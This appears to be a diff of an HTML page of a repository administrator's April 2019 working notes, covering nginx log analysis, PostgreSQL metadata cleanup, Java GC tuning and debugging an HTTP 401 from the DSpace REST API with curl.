# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &quot;07/Apr/2019:(18|19|20)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &#34;07/Apr/2019:(18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
3 66.249.79.62
3 66.249.83.196
4 207.46.13.86
@ -529,7 +529,7 @@ X-XSS-Protection: 1; mode=block
<li><code>2408:8214:7a00:868f:7c1e:e0f3:20c6:c142</code> is some stupid Chinese bot making malicious POST requests</li>
<li>There are free database connections in the pool:</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
7 dspaceCli
23 dspaceWeb
@ -546,7 +546,7 @@ X-XSS-Protection: 1; mode=block
</ul>
</li>
</ul>
<pre><code>$ lein run ~/src/git/DSpace/2019-02-22-affiliations.csv name id
<pre tabindex="0"><code>$ lein run ~/src/git/DSpace/2019-02-22-affiliations.csv name id
</code></pre><ul>
<li>After matching the values and creating some new matches I had trouble remembering how to copy the reconciled values to a new column
<ul>
@ -555,35 +555,35 @@ X-XSS-Protection: 1; mode=block
</ul>
</li>
</ul>
<pre><code>if(cell.recon.matched, cell.recon.match.name, value)
<pre tabindex="0"><code>if(cell.recon.matched, cell.recon.match.name, value)
</code></pre><ul>
<li>See the <a href="https://github.com/OpenRefine/OpenRefine/wiki/Variables#recon">OpenRefine variables documentation</a> for more notes about the <code>recon</code> object</li>
<li>I also noticed a handful of errors in our current list of affiliations so I corrected them:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i 2019-04-08-fix-13-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-04-08-fix-13-affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211 -t correct -d
</code></pre><ul>
<li>We should create a new list of affiliations to update our controlled vocabulary again</li>
<li>I dumped a list of the top 1500 affiliations:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 211 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-04-08-top-1500-affiliations.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 211 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-04-08-top-1500-affiliations.csv WITH CSV HEADER;
COPY 1500
</code></pre><ul>
<li>Fix a few more messed up affiliations that have return characters in them (use Ctrl-V Ctrl-M to re-create control character):</li>
</ul>
<pre><code>dspace=# UPDATE metadatavalue SET text_value='International Institute for Environment and Development' WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE 'International Institute^M%';
dspace=# UPDATE metadatavalue SET text_value='Kenya Agriculture and Livestock Research Organization' WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE 'Kenya Agricultural and Livestock Research^M%';
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=&#39;International Institute for Environment and Development&#39; WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE &#39;International Institute^M%&#39;;
dspace=# UPDATE metadatavalue SET text_value=&#39;Kenya Agriculture and Livestock Research Organization&#39; WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE &#39;Kenya Agricultural and Livestock Research^M%&#39;;
</code></pre><ul>
<li>I noticed a bunch of subjects and affiliations that use stylized apostrophes so I will export those and then batch update them:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE '%%') to /tmp/2019-04-08-affiliations-apostrophes.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE &#39;%%&#39;) to /tmp/2019-04-08-affiliations-apostrophes.csv WITH CSV HEADER;
COPY 60
dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 57 AND text_value LIKE '%%') to /tmp/2019-04-08-subject-apostrophes.csv WITH CSV HEADER;
dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 57 AND text_value LIKE &#39;%%&#39;) to /tmp/2019-04-08-subject-apostrophes.csv WITH CSV HEADER;
COPY 20
</code></pre><ul>
<li>I cleaned them up in OpenRefine and then applied the fixes on CGSpace and DSpace Test:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-60-affiliations-apostrophes.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -d
$ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-20-subject-apostrophes.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-60-affiliations-apostrophes.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211 -t correct -d
$ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-20-subject-apostrophes.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.subject -m 57 -t correct -d
</code></pre><ul>
<li>UptimeRobot said that CGSpace (linode18) went down tonight
<ul>
@ -592,14 +592,14 @@ $ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-20-subject-apostrophes.csv -db
</ul>
</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
7 dspaceCli
250 dspaceWeb
</code></pre><ul>
<li>On a related note I see connection pool errors in the DSpace log:</li>
</ul>
<pre><code>2019-04-08 19:01:10,472 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
<pre tabindex="0"><code>2019-04-08 19:01:10,472 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-319] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:250; idle:0; lastwait:5000].
</code></pre><ul>
<li>But still I see 10 to 30% CPU steal in <code>iostat</code> that is also reflected in the Munin graphs:</li>
@ -609,7 +609,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
<li>Linode Support still didn&rsquo;t respond to my ticket from yesterday, so I attached a new output of <code>iostat 1 10</code> and asked them to move the VM to a less busy host</li>
<li>The web server logs are not very busy:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &quot;08/Apr/2019:(17|18|19)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &#34;08/Apr/2019:(17|18|19)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
124 40.77.167.135
135 95.108.181.88
139 157.55.39.206
@ -620,7 +620,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
457 157.55.39.164
457 40.77.167.132
3822 45.5.184.72
# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &quot;08/Apr/2019:(17|18|19)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &#34;08/Apr/2019:(17|18|19)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
5 129.0.79.206
5 41.205.240.21
7 207.46.13.95
@ -636,7 +636,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
<li>Linode sent an alert that CGSpace (linode18) was 440% CPU for the last two hours this morning</li>
<li>Here are the top IPs in the web server logs around that time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &quot;09/Apr/2019:(06|07|08)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E &#34;09/Apr/2019:(06|07|08)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
18 66.249.79.139
21 157.55.39.160
29 66.249.79.137
@ -647,7 +647,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
1166 45.5.184.72
4251 45.5.186.2
4895 205.186.128.185
# zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &quot;09/Apr/2019:(06|07|08)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &#34;09/Apr/2019:(06|07|08)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
200 144.48.242.108
202 207.46.13.185
206 18.194.46.84
@ -661,11 +661,11 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
</code></pre><ul>
<li><code>45.5.186.2</code> is at CIAT in Colombia and I see they are mostly making requests to the REST API, but also to XMLUI with the following user agent:</li>
</ul>
<pre><code>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
</code></pre><ul>
<li>Database connection usage looks fine:</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
7 dspaceCli
11 dspaceWeb
@ -683,15 +683,15 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
<li>Abenet pointed out a possibility of validating funders against the <a href="https://support.crossref.org/hc/en-us/articles/215788143-Funder-data-via-the-API">CrossRef API</a></li>
<li>Note that if you use HTTPS and specify a contact address in the API request you have less likelihood of being blocked</li>
</ul>
<pre><code>$ http 'https://api.crossref.org/funders?query=mercator&amp;mailto=me@cgiar.org'
<pre tabindex="0"><code>$ http &#39;https://api.crossref.org/funders?query=mercator&amp;mailto=me@cgiar.org&#39;
</code></pre><ul>
<li>Otherwise, they provide the funder data in <a href="https://www.crossref.org/services/funder-registry/">CSV and RDF format</a></li>
<li>I did a quick test with the recent IITA records against reconcile-csv in OpenRefine and it matched a few, but the ones that didn&rsquo;t match will need a human to go and do some manual checking and informed decision making&hellip;</li>
<li>If I want to write a script for this I could use the Python <a href="https://habanero.readthedocs.io/en/latest/modules/crossref.html">habanero library</a>:</li>
</ul>
<pre><code>from habanero import Crossref
cr = Crossref(mailto=&quot;me@cgiar.org&quot;)
x = cr.funders(query = &quot;mercator&quot;)
<pre tabindex="0"><code>from habanero import Crossref
cr = Crossref(mailto=&#34;me@cgiar.org&#34;)
x = cr.funders(query = &#34;mercator&#34;)
</code></pre><h2 id="2019-04-11">2019-04-11</h2>
<ul>
<li>Continue proofing IITA&rsquo;s last round of batch uploads from <a href="https://dspacetest.cgiar.org/handle/10568/100333">March on DSpace Test</a> (20193rd.xls)
@ -720,8 +720,8 @@ x = cr.funders(query = &quot;mercator&quot;)
</li>
<li>I captured a few general corrections and deletions for AGROVOC subjects while looking at IITA&rsquo;s records, so I applied them to DSpace Test and CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2019-04-11-fix-14-subjects.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspace -u dspace -p 'fuuu' -m 57 -f dc.subject -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-04-11-fix-14-subjects.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.subject -m 57 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 57 -f dc.subject -d
</code></pre><ul>
<li>Answer more questions about DOIs and Altmetric scores from WLE</li>
<li>Answer more questions about DOIs and Altmetric scores from IWMI
@ -751,9 +751,9 @@ $ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspac
<p><img src="/cgspace-notes/2019/04/visualvm-solr-indexing-solr-settings.png" alt="Java GC during Solr indexing Solr 4.10.4 settings"></p>
<h2 id="2019-04-14">2019-04-14</h2>
<ul>
<li>Change DSpace Test (linode19) to use the Java GC tuning from the Solr 4.14.4 startup script:</li>
<li>Change DSpace Test (linode19) to use the Java GC tuning from the Solr 4.10.4 startup script:</li>
</ul>
<pre><code>GC_TUNE=&quot;-XX:NewRatio=3 \
<pre tabindex="0"><code>GC_TUNE=&#34;-XX:NewRatio=3 \
-XX:SurvivorRatio=4 \
-XX:TargetSurvivorRatio=90 \
-XX:MaxTenuringThreshold=8 \
@ -766,7 +766,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspac
-XX:CMSInitiatingOccupancyFraction=50 \
-XX:CMSMaxAbortablePrecleanTime=6000 \
-XX:+CMSParallelRemarkEnabled \
-XX:+ParallelRefProcEnabled&quot;
-XX:+ParallelRefProcEnabled&#34;
</code></pre><ul>
<li>I need to remember to check the Munin JVM graphs in a few days</li>
<li>It might be placebo, but the site <em>does</em> feel snappier&hellip;</li>
@ -786,19 +786,19 @@ $ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspac
</ul>
</li>
</ul>
<pre><code>import json
<pre tabindex="0"><code>import json
import re
import urllib
import urllib2
handle = re.findall('[0-9]+/[0-9]+', value)
handle = re.findall(&#39;[0-9]+/[0-9]+&#39;, value)
url = 'https://cgspace.cgiar.org/rest/handle/' + handle[0]
url = &#39;https://cgspace.cgiar.org/rest/handle/&#39; + handle[0]
req = urllib2.Request(url)
req.add_header('User-agent', 'Alan Python bot')
req.add_header(&#39;User-agent&#39;, &#39;Alan Python bot&#39;)
res = urllib2.urlopen(req)
data = json.load(res)
item_id = data['id']
item_id = data[&#39;id&#39;]
return item_id
</code></pre><ul>
@ -809,7 +809,7 @@ return item_id
</li>
<li>I ran a full Discovery indexing on CGSpace because I didn&rsquo;t do it after all the metadata updates last week:</li>
</ul>
<pre><code>$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
<pre tabindex="0"><code>$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 82m45.324s
user 7m33.446s
@ -1001,7 +1001,7 @@ sys 2m13.463s
<li>For future reference, Linode mentioned that they consider CPU steal above 8% to be significant</li>
<li>Regarding the other Linode issue about speed, I did a test with <code>iperf</code> between linode18 and linode19:</li>
</ul>
<pre><code># iperf -s
<pre tabindex="0"><code># iperf -s
------------------------------------------------------------
Server listening on TCP port 5001
TCP window size: 85.3 KByte (default)
@ -1049,11 +1049,11 @@ TCP window size: 85.0 KByte (default)
</li>
<li>I want to get rid of this annoying warning that is constantly in our DSpace logs:</li>
</ul>
<pre><code>2019-04-08 19:02:31,770 WARN org.dspace.xoai.services.impl.xoai.DSpaceRepositoryConfiguration @ { OAI 2.0 :: DSpace } Not able to retrieve the dspace.oai.url property from oai.cfg. Falling back to request address
<pre tabindex="0"><code>2019-04-08 19:02:31,770 WARN org.dspace.xoai.services.impl.xoai.DSpaceRepositoryConfiguration @ { OAI 2.0 :: DSpace } Not able to retrieve the dspace.oai.url property from oai.cfg. Falling back to request address
</code></pre><ul>
<li>Apparently it happens once per request, which can be at least 1,500 times per day according to the DSpace logs on CGSpace (linode18):</li>
</ul>
<pre><code>$ grep -c 'Falling back to request address' dspace.log.2019-04-20
<pre tabindex="0"><code>$ grep -c &#39;Falling back to request address&#39; dspace.log.2019-04-20
dspace.log.2019-04-20:1515
</code></pre><ul>
<li>I will fix it in <code>dspace/config/modules/oai.cfg</code></li>
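<li>Presumably that just means setting the <code>dspace.oai.url</code> property that the warning complains about, something like this (a sketch based on the warning text, not the actual change):</li>
</ul>
<pre tabindex="0"><code># dspace/config/modules/oai.cfg
# tell the OAI interface its own URL so it stops falling back to the request address
dspace.oai.url = ${dspace.baseUrl}/oai
</code></pre>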
@ -1098,7 +1098,7 @@ dspace.log.2019-04-20:1515
</ul>
</li>
</ul>
<pre><code>$ csvcut -c id,dc.identifier.uri,'dc.identifier.uri[]' ~/Downloads/2019-04-24-IITA.csv &gt; /tmp/iita.csv
<pre tabindex="0"><code>$ csvcut -c id,dc.identifier.uri,&#39;dc.identifier.uri[]&#39; ~/Downloads/2019-04-24-IITA.csv &gt; /tmp/iita.csv
</code></pre><ul>
<li>Carlos Tejo from the Land Portal had been emailing me this week to ask about the old REST API that Tsega was building in 2017
<ul>
@ -1108,7 +1108,7 @@ dspace.log.2019-04-20:1515
</ul>
</li>
</ul>
<pre><code>$ curl -f -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;:&quot;cg.subject.cpwf&quot;, &quot;value&quot;:&quot;WATER MANAGEMENT&quot;,&quot;language&quot;: &quot;en_US&quot;}'
<pre tabindex="0"><code>$ curl -f -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.cpwf&#34;, &#34;value&#34;:&#34;WATER MANAGEMENT&#34;,&#34;language&#34;: &#34;en_US&#34;}&#39;
curl: (22) The requested URL returned error: 401
</code></pre><ul>
<li>Note that curl only shows the HTTP 401 error if you use <code>-f</code> (fail), and only then if you <em>don&rsquo;t</em> include <code>-s</code>
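<li>For example (a quick illustration of curl&rsquo;s behavior, not from the original notes), adding <code>-s</code> to <code>-f</code> hides the error message but the failure is still visible in the exit code:</li>
</ul>
<pre tabindex="0"><code>$ curl -f -s -o /dev/null -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.cpwf&#34;, &#34;value&#34;:&#34;WATER MANAGEMENT&#34;,&#34;language&#34;: &#34;en_US&#34;}&#39;
$ echo $?
22
</code></pre>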
@ -1118,19 +1118,19 @@ curl: (22) The requested URL returned error: 401
</ul>
</li>
</ul>
<pre><code>dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang='en_US';
<pre tabindex="0"><code>dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value=&#39;WATER MANAGEMENT&#39; AND text_lang=&#39;en_US&#39;;
count
-------
376
(1 row)
dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang='';
dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value=&#39;WATER MANAGEMENT&#39; AND text_lang=&#39;&#39;;
count
-------
149
(1 row)
dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang IS NULL;
dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value=&#39;WATER MANAGEMENT&#39; AND text_lang IS NULL;
count
-------
417
@ -1138,7 +1138,7 @@ dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AN
</code></pre><ul>
<li>I see that the HTTP 401 issue seems to be a bug due to an item that the user doesn&rsquo;t have permission to access&hellip; from the DSpace log:</li>
</ul>
<pre><code>2019-04-24 08:11:51,129 INFO org.dspace.rest.ItemsResource @ Looking for item with metadata(key=cg.subject.cpwf,value=WATER MANAGEMENT, language=en_US).
<pre tabindex="0"><code>2019-04-24 08:11:51,129 INFO org.dspace.rest.ItemsResource @ Looking for item with metadata(key=cg.subject.cpwf,value=WATER MANAGEMENT, language=en_US).
2019-04-24 08:11:51,231 INFO org.dspace.usage.LoggerUsageEventListener @ anonymous::view_item:handle=10568/72448
2019-04-24 08:11:51,238 INFO org.dspace.usage.LoggerUsageEventListener @ anonymous::view_item:handle=10568/72491
2019-04-24 08:11:51,243 INFO org.dspace.usage.LoggerUsageEventListener @ anonymous::view_item:handle=10568/75703
@ -1146,20 +1146,20 @@ dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AN
</code></pre><ul>
<li>Nevertheless, if I request using the <code>null</code> language I get 1020 results, plus 179 for a blank language attribute:</li>
</ul>
<pre><code>$ curl -s -H &quot;Content-Type: application/json&quot; -X POST &quot;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;:&quot;cg.subject.cpwf&quot;, &quot;value&quot;:&quot;WATER MANAGEMENT&quot;,&quot;language&quot;: null}' | jq length
<pre tabindex="0"><code>$ curl -s -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.cpwf&#34;, &#34;value&#34;:&#34;WATER MANAGEMENT&#34;,&#34;language&#34;: null}&#39; | jq length
1020
$ curl -s -H &quot;Content-Type: application/json&quot; -X POST &quot;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;:&quot;cg.subject.cpwf&quot;, &quot;value&quot;:&quot;WATER MANAGEMENT&quot;,&quot;language&quot;: &quot;&quot;}' | jq length
$ curl -s -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.cpwf&#34;, &#34;value&#34;:&#34;WATER MANAGEMENT&#34;,&#34;language&#34;: &#34;&#34;}&#39; | jq length
179
</code></pre><ul>
<li>This is weird because I see 942 to 1156 items with &ldquo;WATER MANAGEMENT&rdquo; (depending on wildcard matching for errors in subject spelling):</li>
</ul>
<pre><code>dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT';
<pre tabindex="0"><code>dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value=&#39;WATER MANAGEMENT&#39;;
count
-------
942
(1 row)
dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value LIKE '%WATER MANAGEMENT%';
dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value LIKE &#39;%WATER MANAGEMENT%&#39;;
count
-------
1156
@ -1177,13 +1177,13 @@ dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AN
</li>
<li>I tested the REST API after logging in with my super admin account and I was able to get results for the problematic query:</li>
</ul>
<pre><code>$ curl -f -H &quot;Content-Type: application/json&quot; -X POST &quot;https://dspacetest.cgiar.org/rest/login&quot; -d '{&quot;email&quot;:&quot;example@me.com&quot;,&quot;password&quot;:&quot;fuuuuu&quot;}'
$ curl -f -H &quot;Content-Type: application/json&quot; -H &quot;rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b&quot; -X GET &quot;https://dspacetest.cgiar.org/rest/status&quot;
$ curl -f -H &quot;rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;:&quot;cg.subject.cpwf&quot;, &quot;value&quot;:&quot;WATER MANAGEMENT&quot;,&quot;language&quot;: &quot;en_US&quot;}'
<pre tabindex="0"><code>$ curl -f -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/login&#34; -d &#39;{&#34;email&#34;:&#34;example@me.com&#34;,&#34;password&#34;:&#34;fuuuuu&#34;}&#39;
$ curl -f -H &#34;Content-Type: application/json&#34; -H &#34;rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b&#34; -X GET &#34;https://dspacetest.cgiar.org/rest/status&#34;
$ curl -f -H &#34;rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.cpwf&#34;, &#34;value&#34;:&#34;WATER MANAGEMENT&#34;,&#34;language&#34;: &#34;en_US&#34;}&#39;
</code></pre><ul>
<li>I created a normal user for Carlos to try as an unprivileged user:</li>
</ul>
<pre><code>$ dspace user --add --givenname Carlos --surname Tejo --email blah@blah.com --password 'ddmmdd'
<pre tabindex="0"><code>$ dspace user --add --givenname Carlos --surname Tejo --email blah@blah.com --password &#39;ddmmdd&#39;
</code></pre><ul>
<li>But still I get the HTTP 401 and I have no idea which item is causing it</li>
<li>I enabled more verbose logging in <code>ItemsResource.java</code> and now I can at least see the item ID that causes the failure&hellip;
@ -1192,7 +1192,7 @@ $ curl -f -H &quot;rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b&quot;
</ul>
</li>
</ul>
<pre><code>dspace=# SELECT * FROM item WHERE item_id=74648;
<pre tabindex="0"><code>dspace=# SELECT * FROM item WHERE item_id=74648;
item_id | submitter_id | in_archive | withdrawn | last_modified | owning_collection | discoverable
---------+--------------+------------+-----------+----------------------------+-------------------+--------------
74648 | 113 | f | f | 2016-03-30 09:00:52.131+00 | | t
@ -1212,7 +1212,7 @@ $ curl -f -H &quot;rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b&quot;
<ul>
<li>Export a list of authors for Peter to look through:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-04-26-all-authors.csv with csv header;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-04-26-all-authors.csv with csv header;
COPY 65752
</code></pre><h2 id="2019-04-28">2019-04-28</h2>
<ul>
@ -1222,7 +1222,7 @@ COPY 65752
</ul>
</li>
</ul>
<pre><code>dspace=# SELECT * FROM item WHERE item_id=74648;
<pre tabindex="0"><code>dspace=# SELECT * FROM item WHERE item_id=74648;
item_id | submitter_id | in_archive | withdrawn | last_modified | owning_collection | discoverable
---------+--------------+------------+-----------+----------------------------+-------------------+--------------
74648 | 113 | f | f | 2019-04-28 08:48:52.114-07 | | f
@ -1230,7 +1230,7 @@ COPY 65752
</code></pre><ul>
<li>And I tried the <code>curl</code> command from above again, but I still get the HTTP 401 and the same error in the DSpace log:</li>
</ul>
<pre><code>2019-04-28 08:53:07,170 ERROR org.dspace.rest.ItemsResource @ User(anonymous) has not permission to read item(id=74648)!
<pre tabindex="0"><code>2019-04-28 08:53:07,170 ERROR org.dspace.rest.ItemsResource @ User(anonymous) has not permission to read item(id=74648)!
</code></pre><ul>
<li>I even tried to &ldquo;expunge&rdquo; the item using an <a href="https://wiki.lyrasis.org/display/DSDOC5x/Batch+Metadata+Editing#BatchMetadataEditing-Performing'actions'onitems">action in CSV</a>, and it said &ldquo;EXPUNGED!&rdquo; but the item is still there&hellip;</li>
</ul>
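<ul>
<li>For the record, the expunge action is just an extra <code>action</code> column in the metadata CSV, roughly like this per the DSpace 5.x batch metadata editing docs (the collection handle here is hypothetical):</li>
</ul>
<pre tabindex="0"><code>id,collection,action
74648,10568/12345,expunge
</code></pre>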
@ -1239,7 +1239,7 @@ COPY 65752
<li>Send mail to the dspace-tech mailing list to ask about the item expunge issue</li>
<li>Delete and re-create Podman container for dspacedb after pulling a new PostgreSQL container:</li>
</ul>
